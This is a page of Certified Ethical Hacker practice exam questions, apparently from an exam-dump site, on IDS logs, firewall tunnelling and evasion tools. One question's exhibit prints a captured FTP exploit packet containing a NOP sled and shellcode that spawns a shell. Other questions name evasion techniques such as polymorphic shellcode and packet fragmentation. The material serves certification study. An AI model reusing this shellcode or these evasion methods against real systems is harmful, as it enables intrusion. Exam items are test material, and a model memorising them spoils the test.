1. Home
  2. GAQM
  3. CEH-001

Certified Ethical Hacker (CEH)

Exam Details

  • Exam Code
    :CEH-001
  • Exam Name
    :Certified Ethical Hacker (CEH)
  • Certification
    :GAQM certification
  • Vendor
    :GAQM
  • Total Questions
    :878 Q&As
  • Last Updated
    :May 06, 2024

GAQM GAQM certification CEH-001 Questions & Answers

  • Question 21:

    Exhibit:

    TCP TTL:50 TOS:0? ID:53476 DF

    *****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78

    TCP Options => NOP NOP TS: 126045057 105803098

    50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ...........

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

    90 90 90 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD .......1.1.1..F.

    80 31 C0 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E .1.1.C..A.?...k^

    31 C0 31 C9 8D 5E 01 88 46 04 66 B9 FF FF 01 B0 1.1..^..F.f.....

    27 CD 80 31 C0 8D 5E 01 B0 3D CD 80 31 C0 31 DB `..1..^..=..1.1.

    8D 5E 08 89 43 02 31 C9 FE C9 31 C0 8D 5E 08 B0 .^..C.1...1..^..

    0C CD 80 FE C9 75 F3 31 C0 88 46 09 8D 5E 08 B0 .....u.1..F..^..

    3D CD 80 FE 0E B0 30 FE C8 88 46 04 31 C0 88 46 =.....0...F.1..F

    07 89 76 08 89 46 0C 89 F3 8D 4E 08 8D 56 0C B0 ..v..F....N..V..

    0B CD 80 31 C0 31 DB B0 01 CD 80 E8 90 FF FF FF ...1.1..........

    FF FF FF 30 62 69 6E 30 73 68 31 2E 2E 31 31 76 ...0bin0sh1..11v

    65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61 [email protected]

    73 69 65 2E 63 6F 6D 0D 0A sie.com..

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882

    TCP TTL:63 TOS:0?0 ID:48231 DF

    *****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78

    TCP Options => NOP NOP TS: 105803113 126045057

    35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login incorr

    65 63 74 2E 0D 0A ect...

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    12/09-01:22:39.878150 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0?0 ID:48233 DF *****PA* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78 TCP Options => NOP NOP TS: 105803984 126045931 32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at 20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb 79 65 2E 0D 0A ye... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:39.880154 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0?0 ID:48234 DF ***F**A* Seq: 0x110CE859 Ack: 0x33BC7447 Win: 0x7D78 TCP Options => NOP NOP TS: 105803984 126045931 Given the following extract from the snort log on a honeypot, what service is being exploited? :

    A. FTP

    B. SSH

    C. Telnet

    D. SMTP

  • Question 22:

    John has a proxy server on his network which caches and filters web access. He shuts down all unnecessary ports and services. Additionally, he has installed a firewall (Cisco PIX) that will not allow users to connect to any outbound ports. Jack, a network user has successfully connected to a remote server on port 80 using netcat. He could in turn drop a shell from the remote machine. Assuming an attacker wants to penetrate John's network, which of the following options is he likely to choose?

    A. Use ClosedVPN

    B. Use Monkey shell

    C. Use reverse shell using FTP protocol

    D. Use HTTPTunnel or Stunnel on port 80 and 443

  • Question 23:

    A program that defends against a port scanner will attempt to:

    A. Sends back bogus data to the port scanner

    B. Log a violation and recommend use of security-auditing tools

    C. Limit access by the scanning system to publicly available ports only

    D. Update a firewall rule in real time to prevent the port scan from being completed

  • Question 24:

    Eric notices repeated probes to port 1080. He learns that the protocol being used is designed to allow a host outside of a firewall to connect transparently and securely through the firewall. He wonders if his firewall has been breached. What would be your inference?

    A. Eric network has been penetrated by a firewall breach

    B. The attacker is using the ICMP protocol to have a covert channel

    C. Eric has a Wingate package providing FTP redirection on his network

    D. Somebody is using SOCKS on the network to communicate through the firewall

  • Question 25:

    Basically, there are two approaches to network intrusion detection: signature detection, and anomaly detection. The signature detection approach utilizes well- known signatures for network traffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previous history of network traffic to search for patterns that are abnormal, which would indicate an intrusion. How can an attacker disguise his buffer overflow attack signature such that there is a greater probability of his attack going undetected by the IDS?

    A. He can use a shellcode that will perform a reverse telnet back to his machine

    B. He can use a dynamic return address to overwrite the correct value in the target machine computer memory

    C. He can chain NOOP instructions into a NOOP "sled" that advances the processor's instruction pointer to a random place of choice

    D. He can use polymorphic shell code-with a tool such as ADMmutate - to change the signature of his exploit as seen by a network IDS

  • Question 26:

    Neil is closely monitoring his firewall rules and logs on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web site during work hours, without any consideration for others. Neil knows that he has an up-to- date content filtering system and such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction?

    A. They are using UDP that is always authorized at the firewall

    B. They are using an older version of Internet Explorer that allow them to bypass the proxy server

    C. They have been able to compromise the firewall, modify the rules, and give themselves proper access

    D. They are using tunneling software that allows them to communicate with protocols in a way it was not intended

  • Question 27:

    Most NIDS systems operate in layer 2 of the OSI model. These systems feed raw traffic into a detection engine and rely on the pattern matching and/or statistical analysis to determine what is malicious. Packets are not processed by the host's TCP/IP stack allowing the NIDS to analyze traffic the host would otherwise discard. Which of the following tools allows an attacker to intentionally craft packets to confuse pattern-matching NIDS systems, while still being correctly assembled by the host TCP/IP stack to render the attack payload?

    A. Defrag

    B. Tcpfrag

    C. Tcpdump

    D. Fragroute

  • Question 28:

    What is a primary advantage a hacker gains by using encryption or programs such as Loki?

    A. It allows an easy way to gain administrator rights

    B. It is effective against Windows computers

    C. It slows down the effective response of an IDS

    D. IDS systems are unable to decrypt it

    E. Traffic will not be modified in transit

  • Question 29:

    What is the tool Firewalk used for?

    A. To test the IDS for proper operation

    B. To test a firewall for proper operation

    C. To determine what rules are in place for a firewall

    D. To test the webserver configuration

    E. Firewalk is a firewall auto configuration tool

  • Question 30:

    You have performed the traceroute below and notice that hops 19 and 20 both show the same IP address.

    What can be inferred from this output?

    A. An application proxy firewall

    B. A stateful inspection firewall

    C. A host based IDS

    D. A Honeypot

Related Exams:

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only GAQM exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CEH-001 exam preparations and GAQM certification application, do not hesitate to visit our Vcedump.com to find your solutions here.